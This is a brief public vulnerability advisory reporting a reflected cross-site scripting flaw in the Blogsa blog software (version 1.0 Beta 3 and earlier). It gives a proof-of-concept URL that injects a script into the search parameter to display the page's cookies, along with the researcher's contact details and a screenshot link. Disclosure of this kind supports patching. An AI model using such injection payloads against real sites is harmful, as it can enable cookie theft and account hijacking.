########################################################### # Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability # # Software Site: blogsa.net # # Discovered by: Onur YILMAZ aka DJR # # Blog: http://www.onuryilmaz.info # # E-mail: contact<at>onuryilmaz<dot>info # ########################################################### # XSS http://localhost/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script> # Screen http://img14.imageshack.us/img14/7803/12371681.jpg ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.